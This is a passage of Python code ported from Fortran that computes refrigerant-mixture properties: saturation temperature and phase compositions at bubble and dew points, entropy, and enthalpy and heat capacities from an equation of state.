ROUTINE\n\t\t# CALCULATES THE SATURATION TEMPERATURE, THE COMPOSITION OF THE OTHER\n\t\t# PHASE AND THE LIQUID AND VAPOR MOLAR VOLUMES.\n\t\t#\n\t\t# INPUTS:\n\t\t# P - SATURATION PRESSURE (KPA)\n\t\t# ONLY ONE OF: XL - LIQUID COMPOSITION (MOLE FRACTION)\n\t\t# OR: XV - VAPOR COMPOSITION (MOLE FRACTION)\n\t\t# LBUB - LOGICAL VARIABLE\n\t\t# if LBUB = True LIQUID COMPOSITION IS GIVEN (COMPUTE\n\t\t# BUBBLE POINT)\n\t\t# if LBUB = False VAPOR COMPOSITION IS GIVEN (COMPUTE\n\t\t# DEW POINT)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# XL OR XV - COMPOSITION OF CALCULATED PHASE\n\t\t# T - SATURATION TEMPERATURE (K)\n\t\t# VL - LIQUID VOLUME (M * * 3 / KMOL)\n\t\t# VV - VAPOR VOLUME (M * * 3 / KMOL)\n\t\t# LCRIT - ERROR FLAG; SET TO True WHEN THE INPUT PRESSURE\n\t\t# EXCEEDS THE CRITICAL PRESSURE.\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# VIT - ITERATION FOR MOLAR VOLUME\n\t\t# espar - COMPUTATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t# GENERAL NOMENCLATURE FOR FIRST LETTER OF VARIABLE NAMES\n\t\t# A,B - EQUATION OF STATE PARAMETERS\n\t\t# BData.F - MIXING PARAMETER\n\t\t# T - TEMPERATURE\n\t\t# P - PRESSURE\n\t\t# V - MOLAR VOLUME\n\t\t# X - COMPOSITION\n\t\t# G - GIBBS FREE ENERGY\n\t\t# U - CHEMICAL POTENTIAL\n\t\t# Y - COMBINATION OF VARIABLES USED IN EQUATION OF STATE\n\t\t# TOL - CONVERGENCE TOLERANCE FOR ITERATION LOOPS\n\t\t# I,J - INDEX VARIABLES FOR ITERATION AND DO LOOPS\n\t\t# L - LOGICAL VARIABLES SUCH AS NON - CONVERGENCE FLAGS\n\t\t#\n\t\t# GENERAL NOMENCLATURE FOR SECOND OR THIRD LETTER OF VARIABLES\n\t\t# A,B - COMPONENTS OF MIXTURE; COMPOSITION IS MOLE FRACTION BData.A\n\t\t# L - LIQUID PHASE\n\t\t# V - VAPOR PHASE\n\t\t# 1 - PARENT PHASE (PHASE WITH SPECifIED COMPOSITION)\n\t\t# 2 - INCIPIENT PHASE\n\t\t# (FOR EXAMPLE UA1 REFERS TO CHEMICAL POTENTIAL OF COMPONENT BData.A\n\t\t# IN PHASE 1)\n\t\t#\n\t\t#\t COMMON / ESPAR1 / BData.AP(5),BData.BP(5),BData.F(5,5),BData.DADT,BData.DBDT,BData.D2ADT,BData.D2BDT\n\t\t#\t COMMON / NCOMP / BData.NC\n\t\t#\t COMMON / RDATA4 / R\n\t\t#\t COMMON / TOL / TOLR,ITMAX,LUP\n\n\t\t# initialive basic vars\n\t\tLV1CON= False\n\t\tLV2CON= False\n\t\tLXCON = False\n\t\t\n\t\tLXPOS = False\n\t\tLXNEG = False\n\t\t\n\t\tLTPOS = False\n\t\tLTNEG = False\n\t\t\n\t\tLPPCON= False\n\t\tLCRIT = False\n\n\t\t# DIMENSION TT(3),FT(2)\n\t\tTT = [0.0] * (3+1)\n\t\tFT = [0.0] * (2+1)\n\t\t# DIMENSION XL(5),XV(5), 
X1(5),X2(5),X2C(5),XX2(5) ,Z(5),\n\t\t# FX2(5),U1(5),U2(5),UL(5),PL(5)\n\t\tX1 = [0.0] * (5+1)\n\t\tX2 = [0.0] * (5+1)\n\t\t\n\t\tX2C= [0.0] * (5+1)\n\t\tXX2= [0.0] * (5+1)\n\n\t\tZ = [0.0] * (5+1)\n\t\tFX2= [0.0] * (5+1)\n\t\tU1 = [0.0] * (5+1)\n\t\tU2 = [0.0] * (5+1)\n\t\tUL = [0.0] * (5+1)\n\t\tPL = [0.0] * (5+1)\n\n\t\tTC = 340.0\n\t\t# SAVE BData.TNEG,BData.TPOS set as Data vars\n\t\t#BData.TNEG = 9999.0\n\t\t#BData.TPOS = -999.0\n\n\t\t#\n\t\t# STATEMENT FUNCTIONS FOR GIBBS FREE ENERGY AND CHEMICAL POTENTIAL\n\t\t# NOTE THAT SINCE ONLY DIFFERENCES OF G AND U ARE USED IN THE PROGRAM\n\t\t# ANY TERMS WHICH WOULD CANCEL ARE OMITTED. \n\t\t# both g and u are divided by r * t to obtain dimensionless quantities.\n\t\t#\n\t\t\t\t\n\t\t# Python: this is the original function for gibbs, gives bad results\n\t\t#def G ( T,V,A,B):\n\t\t#\t# both G and U are divided by r * t to obtain dimensionless quantities.\n\t\t#\treturn - math.log(V) \n\t\t#\t+ 0.25 * B * ((8.0 * V - 2.25 * B) * V \t\\\n\t\t#\t+ 0.1875 * B * B) / ((V - 0.25*B)**2) / (V - 0.25 * B) \t\\\n\t\t#\t+ (A / B * math.log(V / (V + B)) \\\n\t\t#\t- A / (V + B) ) / (BData.R * T)\n\t\t\n\t\t\n\t\t#\n\t\t# COMPUTE PURE COMPONENT E.S. COEFFICIENTS, THE MIXING PARAMETER,\n\t\t# AND THE E.O.S. COEFFICIENTS FOR PHASE 1\n\t\t#\n\t\tif (LBUB) :\n\t\t\tX1 = XL [:]\n\t\t\tXV = XL [:]\n\t\t\t#for I in range(1, BData.NC + 1 ): # DO 100 I = 1,BData.NC\n\t\t\t#\tX1[I] = XL[I]\n\t\t\t#\tXV[I] = XL[I]\n\t\telse:\n\t\t\tX1 = XV [:]\n\t\t\tXL = XV [:]\n\t\t\t#for I in range(1, BData.NC + 1 ): # DO 120 I = 1,BData.NC\n\t\t\t#\tX1[I] = XV[I]\n\t\t\t#\tXL[I] = XV[I]\n\t\t#\n\t\t# FIND CRITICAL POINT OF THE PURE (OR PSEUDO - PURE) MATERIAL\n\t\t# AND BASE INITIAL GUESS FOR TEMPERATURE ON A SIMPLE, EMPIRICAL\n\t\t# RELATIONSHIP BETWEEN REDUCED PRESSURE AND REDUCED TEMPERATURE\n\t\t# THAT IS REASONABLY ACCURATE FOR REFRIGERANTS.\n\t\t#\n\t\tLCRIT = False\n\t\t[TC, PC, VC] = self.critx(X1,TC)\t#\tCALL CRITX (X1,TC,PC,VC)\n\t\t\n\t\tTT[1] = TC / (1.0 - 0.153 * math.log(P / PC))\n\n\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\n\t\t[A1, B1] = self.espar(0, TT[1], X1 ) #\tCALL espar (0,TT(1),X1,A1, B1)\n\t\t\n\t\tVL = 0.8 * B1\n\t\tVV = BData.R * TT[1] / P\n\t\t\n\t\t#\n\t\t# ENTER ITERATION FOR PURE COMPONENT. 
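\n\t\t# [python editor note] worked example of the empirical starting guess\n\t\t# above, assuming P/PC = 0.5: log(0.5) = -0.693, so\n\t\t# TT(1) = TC/(1 + 0.153*0.693) = TC/1.106, i.e. about 0.90*TC.\n\t\t# 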
THIS ITERATION VARIES\n\t\t# TEMPERATURE UNTIL THE GIBBS FREE ENERGY OF BOTH PHASES ARE EQUAL.\n\t\t# A COMBINATION OF SECANT AND REGULI - FALSI METHODS IS USED\n\t\t# FOR THE ITERATION.\n\t\t#\n\t\tif (BData.NC == 1) :\n\t\t\tif (P > PC) :\n\t\t\t\tLCRIT = True\n\t\t\t\tprint (\"bublp: critical point of pure or pseudo-pure material\")\n\t\t\t\treturn [0.0, 0.0, 0.0, True]\n\n\t\t\tJ = 1\n\t\t\tLTPOS = False\n\t\t\tLTNEG = False\n\t\t\tLPPCON= False\n\t\t\t\n\t\t\tb_python_flag_loop1 = False\n\t\t\t\n\t\t\tfor IT in range( 1, BData.ITMAX + 1 ): # DO 400 IT = 1,ITMAX\n\t\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t\t[A1, B1] = self.espar(0, TT[J], X1 ) #\tCALL espar (0,TT(J),X1, A1, B1)\n\t\t\t\tLV1CON = False\n\t\t\t\tLV2CON = False\n\t\t\t\t\n\t\t\t\tif B1 <= 0:\n\t\t\t\t\tprint (\"bublp : bad input parameter for vit, B <= 0, B=\",B1)\n\t\t\t\t\tprint (\" input Temperature(K) =\", TT[J] )\n\t\t\t\t\tprint ('Application terminated in python\\n')\n\t\t\t\t\tsys.exit('1021')\n\t\t\t\t\t\n\t\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t\t[VL, LV1CON] = self.vit (TT[J], P, A1, B1, VL, True) \t#CALL VIT (TT(J), P, A1,B1, VL, True, LV1CON)\n\t\t\t\t[VV, LV2CON] = self.vit (TT[J], P, A1, B1, VV, False) \t#CALL VIT (TT(J), P, A1,B1, VV, False, LV2CON)\n\n\t\t\t\tGL = self.gibbs( TT[J], VL, A1, B1)\n\t\t\t\tGV = self.gibbs( TT[J], VV, A1, B1)\n\n\t\t\t\tFT[J] = GL - GV\n\n\t\t\t\tif (abs(FT[J]) < 100.0 * BData.TOLR):\n\t\t\t\t\tb_python_flag_loop1 = True\n\t\t\t\t\tbreak\t#\tGOTO 440\n\n\t\t\t\tif (FT[J] < 0.0) :\n\t\t\t\t\tLTNEG = True\n\t\t\t\t\tFTNEG = FT[J]\n\t\t\t\t\tBData.TNEG = TT[J]\n\t\t\t\telse:\n\t\t\t\t\tLTPOS = True\n\t\t\t\t\tFTPOS = FT[J]\n\t\t\t\t\tBData.TPOS = TT[J]\n\n\t\t\t\tif (IT <= 1):\n\t\t\t\t\tTT[2] = 0.95 * TT[1]\n\t\t\t\t\tJ = 2\n\t\t\t\telse:\n\t\t\t\t\tDGDT = (FT[2] - FT[1]) / (TT[2] - TT[1] )\n\t\t\t\t\tif (DGDT == 0.0) :\n\t\t\t\t\t\tb_python_flag_loop1 = True\n\t\t\t\t\t\tbreak\t#\tGOTO 440\n\t\t\t\t\t# NEXT GUESS FOR TEMPERATURE GIVEN BY SECANT METHOD\n\t\t\t\t\tTT[3] = TT[2] - FT[2] / DGDT\n\t\t\t\t\t\n\t\t\t\t\t# IF NEXT GUESS FOR TEMPERATURE IS FURTHER FROM SOLUTION THAN\n\t\t\t\t\t# PREVIOUS BEST GUESS, USE REGULI - FALSI METHOD FOR NEXT GUESS\n\t\t\t\t\tif (LTNEG and LTPOS) :\n\t\t\t\t\t\tif (TT[3] < min(BData.TNEG, BData.TPOS) or TT[3] > max(BData.TNEG,BData.TPOS)) :\n\t\t\t\t\t\t\tTT[3] = BData.TPOS - FTPOS * (BData.TPOS - BData.TNEG) / (FTPOS - FTNEG)\n\t\t\t\t\t\n\t\t\t\t\tTT[1] = TT[2]\n\t\t\t\t\tFT[1] = FT[2]\n\t\t\t\t\tTT[2] = TT[3]\n\n\t\t\t# point 400 CONTINUE\n\t\t\t# if ITERATION HAS NOT CONVERGED, SET ERROR FLAG.\n\t\t\tif not b_python_flag_loop1:\n\t\t\t\tLPPCON = True\n\t\t\t# END OF PURE COMPONENT ITERATION\n\t\t\t#\n\t\t\t# point 440\tCONTINUE\n\t\t\tif (LV1CON): print ('bublp: iteration in bublp for parent phase volume, did not converge')\n\t\t\tif (LV2CON): print ('bublp: iteration in bublp for incipient phase volume, did not converge')\n\t\t\tif (LPPCON): print ('bublp: pure material temperature iteration in bublp, did not converge')\n\t\t\tT = TT[J]\n\t\t\treturn [XL,XV ,T,VL,VV, LCRIT]\n\t\t# end of IF\n\n\t\t#\n\t\t# ENTER ITERATION FOR MIXTURE\n\t\t#\n\t\t# THE MIXTURE ITERATION CONSISTS OF TWO CONCENTRIC ITERATION\n\t\t# LOOPS WHICH VARY THE TEMPERATURE OF THE MIXTURE AND THE\n\t\t# COMPOSITION OF THE COMPUTED PHASE TO GIVE EQUAL CHEMICAL\n\t\t# POTENTIALS FOR EACH OF THE COMPONENTS BETWEEN THE TWO PHASES.\n\t\t# THE INITIAL GUESS FOR THE TEMPERATURE IS GIVEN BY THE CALCULATION\n\t\t# ABOVE; THE INITIAL GUESS FOR 
COMPOSITION IS THAT X2 = X1.\n\t\t#\n\t\tJ = 1\n\t\tX2C = X1 [:]\n\t\t#for I in range(1, BData.NC +1 ): # DO 500 I = 1,BData.NC\n\t\t#\tX2C[I] = X1[I]\n\n\t\tif (LBUB) :\n\t\t\tV1 = VL\n\t\t\tV2 = VV\n\t\telse:\n\t\t\tV1 = VV\n\t\t\tV2 = VL\n\n\t\tLTNEG = False\n\t\tLTPOS = False\n\n\t\tb_python_flag_loop8 = False\n\t\tfor ITT in range(1, BData.ITMAX + 1): # DO 800 ITT = 1,ITMAX\n\t\t\tXX2 = X2C[:]\n\t\t\t#for I in range(1, BData.NC +1 ): # DO 520 I = 1,BData.NC\n\t\t\t#\tXX2[I] = X2C[I]\n\t\t\t\t\n\t\t\tLXCON = False\n\t\t\tLV1CON = False\n\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t[A1, B1] = self.espar(0, TT[J], X1 ) \t\t\t\t\t# CALL espar (0,TT(J),X1, A1, B1)\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[V1, LV1CON] = self.vit (TT[J] , P, A1, B1, V1, LBUB)\t\t# CALL VIT (TT(J), P, A1, B1,V1,LBUB,LV1CON)\n\t\t\t#\n\t\t\t# IF VOLUME ITERATION HAS NOT CONVERGED, TRY BData.A NEW TEMPERATURE AND\n\t\t\t# RETURN TO THE BEGINNING OF THE ITERATION\n\t\t\t#\n\t\t\tif (LV1CON or LXCON) :\n\t\t\t\tTT[J] = 0.95 * TT[J]\n\t\t\t\tcontinue # GOTO 800 exit loop\n\t\t\t\n\t\t\t# COMPUTE CHEMICAL POTENTIALS FOR PHASE 1\n\t\t\tfor I in range(1, BData.NC + 1): # DO 540 I = 1,BData.NC\n\t\t\t\tU1[I] = self.U_Func (TT[J],X1,I,V1, A1,B1, BData.AP,BData.BP,BData.F)\n\t\t\t#\n\t\t\t# ENTER INNER ITERATION LOOP (FOR COMPOSITION OF PHASE 2)\n\t\t\t#\n\t\t\t#JJ = 1 useless allway one, used once\n\t\t\tLXNEG = False\n\t\t\tLXPOS = False\n\t\t\t\n\t\t\tb_python_flag_loop3 = False\n\t\t\tb_python_flag_outer = False\n\t\t\tfor IT in range(1, BData.ITMAX + 1): # DO 600 IT = 1,ITMAX\n\t\t\t\tLV2CON = False\n\t\t\t\t# COMPUTE EQUATION OF STATE COEFFICIENTS FOR PHASE 2\n\t\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t\t[A2, B2] = self.espar(0, TT[J], XX2 ) # JJ allway 1\tCALL espar (0,TT(J),XX2(JJ), A2, B2)\n\t\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t\t[V2, LV2CON] = self.vit (TT[J], P, A2, B2, V2, not LBUB)\t\t# CALL VIT (TT(J),P, A2, B2, V2,.NOT.LBUB, LV2CON)\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\t# if VOLUME ITERATION HAS NOT CONVERGED, TRY BData.A NEW TEMPERATURE\n\t\t\t\t# AND RETURN TO THE START OF THE TEMPERATURE ITERATION.\n\t\t\t\t#\n\t\t\t\tif (LV2CON) :\n\t\t\t\t\tb_python_flag_outer = True\n\t\t\t\t\tTT[J] = 0.95 * TT[J]\n\t\t\t\t\tcontinue\t# GOTO 800\n\n\t\t\t\t# COMPUTE CHEMICAL POTENTIALS OF PHASE 2\n\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 560 I = 1,BData.NC\n\t\t\t\t\tU2[I] = self.U_Func (TT[J], XX2,I,V2, A2,B2, BData.AP,BData.BP,BData.F)\n\t\t\t\t#\n\t\t\t\t# CALCULATE THE COMPOSITION OF PHASE 2 FROM THE COMPOSITION\n\t\t\t\t# OF PHASE 1 AND THE CHEMICAL POTENTIALS. 
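\n\t\t\t\t# [python editor note] this is classic successive substitution:\n\t\t\t\t# Z(I) = X1(I)*EXP(U1(I)-U2(I)) plays the role of K(I)*X1(I), and\n\t\t\t\t# dividing by C = SUM(Z) renormalises the trial composition; at\n\t\t\t\t# equilibrium C -> 1, which the outer loop tests via FT(J) = 1 - C.\n\t\t\t\t# 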
THE INNER ITERATION\n\t\t\t\t# LOOP HAS CONVERGED WHEN THE CALCULATED COMPOSITION EQUALS\n\t\t\t\t# (WITHIN BData.A CONVERGENCE TOLERANCE) THE GUESSED VALUE OF X2.\n\t\t\t\t#\n\t\t\t\tFXSUM = 0.0\n\t\t\t\tC = 0.0\n\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 580 I = 1,BData.NC\n\t\t\t\t\tZ[I] = X1[I] * math.exp(U1[I] - U2[I])\n\t\t\t\t\tC = C + Z[I]\n\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 584 I = 1,BData.NC\n\t\t\t\t\tX2C[I] = Z[I] / C\n\t\t\t\t\tFX2[I] = X2C[I] - XX2[I]\n\t\t\t\t\tXX2[I] = X2C[I]\n\t\t\t\t\tFXSUM = FXSUM + abs(FX2[I])\n\n\t\t\t\tif(IT <= 1): FXOLD = 1.0E6\n\n\t\t\t\tif (FXSUM < BData.NC * BData.TOLR):\n\t\t\t\t\tb_python_flag_loop3 = True\n\t\t\t\t\tbreak \t# GO TO 640\n\n\t\t\t\tFXDIF = abs(FXSUM - FXOLD)\n\t\t\t\t\n\t\t\t\tif(FXDIF <= 10.0 * BData.TOLR and IT >= BData.ITMAX):\n\t\t\t\t\tb_python_flag_loop3 = True\n\t\t\t\t\tbreak \t# GO TO 640\n\n\t\t\t\tFXOLD = FXSUM\n\t\t\t# end of loop \t600 CONTINUE\n\t\t\t\n\t\t\tif b_python_flag_outer :\n\t\t\t\tcontinue # goto 800\n\t\t\t\t\n\t\t\t# IF INNER ITERATION LOOP HAS NOT CONVERGED, SET ERROR FLAG\n\t\t\tif not b_python_flag_loop3:\n\t\t\t\tprint (IT, FXSUM, BData.NC * BData.TOLR,FXSUM / (BData.NC * BData.TOLR), FXDIF)\n\t\t\t\tLXCON = True\n\t\t\t#\n\t\t\t# END OF ITERATION LOOP FOR PHASE 2 COMPOSITION\n\n\t\t\t# point 640 Con\n\t\t\tFT[J] = 1.0 - C\n\t\t\t#\n\t\t\t# OUTER (TEMPERATURE) ITERATION HAS CONVERGED WHEN BData.C = 1.000\n\t\t\t# (I.E. WHEN THE CHEMICAL POTENTIALS OF EACH COMPONENT ARE\n\t\t\t# THE SAME IN BOTH PHASES).\n\t\t\t#\n\n\t\t\tif (abs(FT[J]) < 100.0 * BData.TOLR):\n\t\t\t\tb_python_flag_loop8 = True\n\t\t\t\tbreak\t#GOTO 840\n\t\t\t#\n\t\t\t# PROVIDED THAT THE X2 ITERATION HAS CONVERGED FOR THE CURRENT\n\t\t\t# GUESS OF TEMPERATURE, UPDATE THE POSITIVE AND NEGATIVE\n\t\t\t# BOUNDS FOR USE WITH THE REGULI - FALSI METHOD.\n\t\t\t#\n\t\t\tif (not LXCON) :\n\t\t\t\tif (FT[J] < 0.0) :\n\t\t\t\t\tLTNEG = True\n\t\t\t\t\tFTNEG = FT[J]\n\t\t\t\t\tBData.TNEG = TT[J]\n\t\t\t\telse:\n\t\t\t\t\tLTPOS = True\n\t\t\t\t\tFTPOS = FT[J]\n\t\t\t\t\tBData.TPOS = TT[J]\n\t\t\t#\n\t\t\t# COMPUTE NEW GUESS FOR SATURATION TEMPERATURE.\n\t\t\t# FOR THE SECOND ITERATION, COMPUTE AN APPROXIMATE SATURATION\n\t\t\t# PRESSURE CORRESPONDING TO THE CURRENT GUESS OF TEMPERATURE\n\t\t\t# AND ADJUST THE GUESS FOR TEMPERATURE ACCORDING TO THE\n\t\t\t# DEVIATION BETWEEN THE CALCULATED AND INPUT PRESSURES\n\t\t\t#\n\t\t\tif (ITT <= 2) :\n\t\t\t\tif (LBUB) :\n\t\t\t\t\tP2 = P * C\n\t\t\t\telse:\n\t\t\t\t\tP2 = P / C\n\t\t\t\t\n\t\t\t\tTT[3] = 1.0 / (1.0 / TT[J] + 0.0004 * (math.log(P2) - math.log(P)))\n\t\t\t\t\n\t\t\t\tif (J <= 1) :\n\t\t\t\t\tJ = 2\n\t\t\t\telse:\n\t\t\t\t\tTT[1] = TT[2]\n\t\t\t\t\tFT[1] = FT[2]\n\t\t\t\t\n\t\t\t\tTT[2] = TT[3]\n\t\t\t\t\n\t\t\telse:\n\t\t\t\t# FOR THIRD AND SUBSEQUENT ITERATIONS, USE SECANT / REGULI - FALSI\n\t\t\t\tTT[3] = TT[2] - FT[2] * (TT[2] - TT[1]) / (FT[2] - FT[1])\n\t\t\t\t\n\t\t\t\tif ((TT[3] > max(BData.TNEG,BData.TPOS) or \t\\\n\t\t\t\t\tTT[3] < min(BData.TNEG,BData.TPOS)) and LTNEG and LTPOS):\n\t\t\t\t\t\n\t\t\t\t\tTT[3] = BData.TPOS - FTPOS * (BData.TPOS - BData.TNEG) / (FTPOS - FTNEG)\n\t\t\t \n\t\t\t\tTT[1] = TT[2]\n\t\t\t\tTT[2] = TT[3]\n\t\t\t\tFT[1] = FT[2]\n\t\t\t\n\t\t#\n\t\t# End of loop 800 CONTINUE\n\n\t\tif not\tb_python_flag_loop8 :\n\t\t\tprint (BData.LUP, 'MIXTURE TEMPERATURE ITERATION IN BUBLP DID NOT, CONVERGE')\n\t\t\n\t\t# point 840\n\t\tT = TT[J]\n\t\t# \n\t\t#\n\t\t# ASSIGN RESULTS FOR PHASES 1 AND 2 TO LIQUID AND VAPOR PHASES\n\t\t# DEPENDING ON WHETHER 
THE DEW OR BUBBLE POINT WAS CALCULATED.\n\t\t#\n\t\tif (LBUB) :\n\t\t\t#for I in range(1, BData.NC + 1): # DO 860 I = 1,BData.NC\n\t\t\t#\tXV[I] = XX2[I]\n\t\t\tXV = XX2[:]\n\t\t\tVL = V1\n\t\t\tVV = V2\n\t\t\t\n\t\telse:\n\t\t\t#for I in range(1, BData.NC + 1): # DO 880 I = 1,BData.NC\n\t\t\t#\tXL[I] = XX2[I]\n\t\t\tXL = XX2[:]\n\t\t\tVL = V2\n\t\t\tVV = V1\n\t\t#\n\t\t# PRINT WARNING MESSAGES FOR ANY CASES OF NON - CONVERGENCE OCCURRING\n\t\t# ON FINAL CALL TO EACH ITERATION AND RETURN.\n\t\t#\n\t\tif (abs(1.0 - VL / VV) < BData.TOLR) :\n\t\t\tLCRIT = True\n\t\t\tprint(BData.LUP, 'CRITICAL POINT EXCEEDED IN BUBLP')\n\t\t\n\t\tif (LV1CON): print (BData.LUP, 'ITERATION IN BUBLP FOR PARENT PHASE VOLUME DID NOT CONVERGE')\n\t\tif (LV2CON): print (BData.LUP, 'ITERATION IN BUBLP FOR INCIPIENT PHASE VOLUME DID NOT CONVERGE')\n\t\tif (LXCON) : print (BData.LUP, 'COMPOSITION ITERATION IN BUBLP DID NOT CONVERGE')\n\n\t\treturn [XL,XV ,T,VL,VV, LCRIT]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef entrop (self, T,V,X ):\n\n\t\t#\t FUNCTION ENTROP(T,V,X)\n\t\t#\n\t\t# COMPUTE SPECIFIC ENTROPY OF A SINGLE PHASE TWO-COMPONENT MIXTURE\n\t\t# AS A FUNCTION OF TEMPERATURE, SPECIFIC VOLUME, AND COMPOSITION\n\t\t#\n\t\t# INPUTS:\n\t\t# T - TEMPERATURE (K)\n\t\t# V - SPECIFIC VOLUME (M**3/KG MOL)\n\t\t# X - COMPOSITION (MOLE FRACTION)\n\t\t#\n\t\t# OUTPUT:\n\t\t# S - SPECIFIC ENTROPY (KJ/(KG MOL K))\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED BY ENTROP:\n\t\t# espar - COMPUTATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t#\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t DIMENSION X(5)\n\t\t#\t COMMON /NCOMP/ NC\n\n\t\t#\t COMMON /ESPAR1/ AP(5),BP(5),F(5,5), C1,D1,C2,D2\n\t\t# similar to COMMON /ESPAR1/ AP(5),BP(5),F(5,5), DADT,DBDT,D2ADT,D2BDT\n\n\t\t#\t COMMON /HSPURE/ HP(5),SP(5),CP(5)\n\t\t#\t COMMON /REF/ TREF(5),HR(5),SR(5),VR(5)\n\t\t#\t COMMON /RDATA4/ R\n\t\t[A, B] = self.espar (1, T, X)\t# CALL espar (1,T,X ,A,B)\n\t\t\n\t\tB4 = 0.25 * B\n\t\tS = (BData.DADT * B - A * BData.DBDT)/ (B**2 ) * math.log((V+B)/V) + A * BData.DBDT/B/(V+B) \\\n\t\t\t-BData.R*B4/(V-B4)**2 *(4.0*V-3*B4)\t\t\\\n\t\t\t-BData.R*T*BData.DBDT*0.5*V/(V-B4)**3 *(2.0*V-B4)\n\n\t\tfor I in range (1, BData.NC +1): \t#DO 120 I=1,NC\n\t\t\tS = S + X[I] * (BData.SP[I] - BData.SR[I] + BData.R * math.log(V/ BData.VR[I]))\n\n\t\t\tif (X[I] > 0.0 and X[I] < 1.0) :\n\t\t\t\tS = S - BData.R * X[I] * math.log(X[I])\n\n\t\treturn S\n\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef hcvcps (self, IQ, T, V, X):\t# H, CV, CP, VS\n\t\t# [P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t# SUBROUTINE HCVCPS (IQ, T, V, X, H, CV, CP, VS)\n\t\t#\n\t\t# GIVEN TEMPERATURE, SPECIFIC VOLUME AND COMPOSITION COMPUTE ENTHALPY\n\t\t# AND / OR HEAT CAPACITY AT CONSTANT VOLUME AND PRESSURE AS SPECIFIED\n\t\t# BY OUTPUT QUALIFIER IQ. 
(SINGLE PHASE ONLY)\n\t\t#\n\t\t# INPUTS:\n\t\t# IQ - OUTPUT QUALIFIER\n\t\t# = 1 COMPUTE ENTHALPY ONLY\n\t\t# = 2 ENTHALPY AND CONSTANT VOLUME HEAT CAPACITY\n\t\t# = 3 ENTHALPY AND HEAT CAPACITY AT CONSTANT VOLUME AND PRESSURE\n\t\t# = 4 COMPUTE HEAT CAPACITY AT CONSTANT VOLUME ONLY\n\t\t# = 5 HEAT CAPACITY AT CONSTANT VOLUME AND AT CONSTANT PRESSURE\n\t\t# T - TEMPERATURE (K)\n\t\t# V - SPECIFIC VOLUME (M * * 3 / KG MOL)\n\t\t# X - COMPOSITION (MOLE FRACTION)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# H - SPECIFIC ENTHALPY (KJ / KG MOL)\n\t\t# CV - HEAT CAPACITY AT CONSTANT VOLUME (KJ / (KG MOL K))\n\t\t# CP - HEAT CAPACITY AT CONSTANT PRESSURE (KJ / (KG MOL K))\n\t\t# VS - VELOCITY OF SOUND (M/S); COMPUTED ONLY FOR IQ = 3 OR 5\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED BY HCVCP:\n\t\t# espar - COMPUTATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t#\n\t\t#\t IMPLICIT REAL (A - H,O - Z)\n\t\t#\t COMMON / NCOMP / BData.NC\n\t\t#\t COMMON / ESPAR1 / BData.AP(5),BData.BP(5),BData.F(5,5), C1,D1,C2,D2\n\t\t# similar to /ESPAR1/ AP(5),BP(5),F(5,5), DADT,DBDT,D2ADT,D2BDT\n\t\t#\t COMMON / HSPURE / HP(5),SP(5),BData.CP(5)\n\t\t#\t COMMON / REF / BData.TREF(5),BData.HR(5),SR(5),VR(5)\n\t\t#\t COMMON / RDATA2 / BData.WM(5),TC(5)\n\t\t#\t COMMON / RDATA4 / R\n\t\t#\t DIMENSION X(5)\n\t\t#X = [0.0] * (5+1)\n\n\t\t[A, B] = self.espar (IQ,T,X)\t#CALL espar (IQ,T,X,A,B)\n\t\tB4 = 0.25 * B\n\t\tVB = V + B\n\t\t\n\t\tif (V / VB) <= 0 or B<=0:\n\t\t\tprint (\"hcvcps : bad input parameter, V/(V+B)<= 0 or B<=0\")\n\t\t\tprint (\" input B for the given X =\", B)\n\t\t\tprint (\" input Temperature(K) =\", T)\n\t\t\tprint (' input X ' , X)\n\t\t\tprint (' input V ' , V)\n\t\t\tprint ('Application terminated in python\\n')\n\t\t\tsys.exit()\t# ('1030') - python fix: 'sys.exit' was a bare reference and never actually exited\n\t\t\t\n\t\tVBL = math.log(V / VB)\n\t\tVB4 = V - B4\n\t\t\n\t\tVB43 = VB4**3\t#pow(VB4, 3)\n\t\tRT = BData.R * T\n\t\t\n\t\tH = 0.0 # python default: H is only computed for IQ <= 3\n\t\tVS = 0.0 # python default: VS is only computed for IQ = 3 or 5\n\t\tCV = 0.0 # python default: CV is only computed for IQ >= 2\n\t\tCP = 0.0 # python default: CP is only computed for IQ = 3 or 5\n\t\t\n\t\tif (IQ <= 3) :\n\t\t\t# COMPUTE ENTHALPY AS A FUNCTION OF T, V, X\n\t\t\tH = ( (A + (A * BData.DBDT / B - BData.DADT) * T) * VBL + A * (BData.DBDT * T - B) / VB) / B\t\t\\\n\t\t\t\t+ 2.0 * RT * V * (2.0 * V - B4) * (B4 - 0.25 * BData.DBDT * T) / VB43\n\t\t\t\t\n\t\t\tfor I in range(1, BData.NC + 1): # DO 120 I = 1,BData.NC\n\t\t\t\tH = H + X[I] * (BData.HP[I] - BData.HR[I])\n\t\t\n\t\tif (IQ >= 2) :\n\t\t\t# COMPUTE CONSTANT VOLUME HEAT CAPACITY\n\t\t\tD12 = BData.DBDT * BData.DBDT\n\t\t\tCV = (BData.R * V * ((0.375 * D12 * T / VB4 \t\\\n\t\t\t\t+ 0.5 * BData.D2BDT * T + BData.DBDT) * (B4 - 2.0 * V)\t\\\n\t\t\t\t+ 0.125 * D12 * T) / 